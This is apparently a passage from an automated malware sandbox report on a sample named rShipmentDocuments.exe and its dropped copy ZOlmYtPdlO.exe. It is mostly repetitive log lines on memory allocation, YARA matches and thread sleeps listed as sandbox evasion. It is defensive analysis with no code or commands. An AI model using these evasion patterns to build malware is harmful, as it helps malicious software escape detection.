Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 1770000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 32D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 18E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 93B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: A3B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: A5B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: B5B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 2A30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 2C10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 4C10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 940000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 2810000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: CA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 8360000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 9360000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 9550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: A550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 1730000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 3060000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 5060000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599805
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599687
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599578
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599469
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599359
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599250
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599140
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599024
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598906
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598796
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598687
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598578
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598468
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598359
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598250
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598126
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598000
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597890
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597781
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597669
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597533
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597387
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597275
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597154
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597047
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596937
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596828
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596718
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596609
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596500
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596390
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596281
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596172
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596062
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595953
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595843
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595734
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595625
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595515
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595406
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595297
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595187
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595068
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594953
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594844
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594734
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594624
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594515
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594406
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599779
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599292
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599175
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599054
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598836
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598607
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598281
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598171
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597953
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597843
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597624
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597296
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597187
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597078
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596968
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596859
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596740
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596280
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595719
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595609
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595281
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595172
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594952
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594843
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594625
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594496
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594221
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594073
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9520
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9098
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Window / User API: threadDelayed 5031
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Window / User API: threadDelayed 4826
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Window / User API: threadDelayed 4456
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Window / User API: threadDelayed 5387
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 7320 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep count: 9520 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596 Thread sleep count: 50 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7804 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 2688 Thread sleep count: 5031 > 30
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599805s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599687s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599578s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 2688 Thread sleep count: 4826 > 30
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599469s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599359s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599250s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599140s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599024s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598906s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598796s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598687s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598578s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598468s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598359s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598250s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598126s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598000s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597890s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597781s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597669s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597533s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597387s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597275s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597154s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597047s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596718s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596281s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596172s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595953s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595843s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595734s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595625s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595515s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595406s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595297s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595187s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595068s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -594953s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -594844s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -594734s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -594624s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -594515s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -594406s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 7868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3384 Thread sleep count: 4456 > 30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3384 Thread sleep count: 5387 > 30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599779s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599292s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599175s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599054s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598836s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598719s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598607s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598390s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598281s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598171s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598062s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597953s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597843s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597734s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597624s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597515s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597406s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597296s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597187s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597078s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596968s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596859s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596740s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596280s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596172s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595953s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595844s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595719s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595609s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595390s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595281s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595172s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595062s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594952s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594843s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594734s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594625s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594496s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594221s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594073s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599805
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599687
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599578
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599469
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599359
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599250
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599140
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599024
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598906
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598796
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598687
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598578
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598468
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598359
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598250
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598126
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598000
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597890
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597781
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597669
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597533
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597387
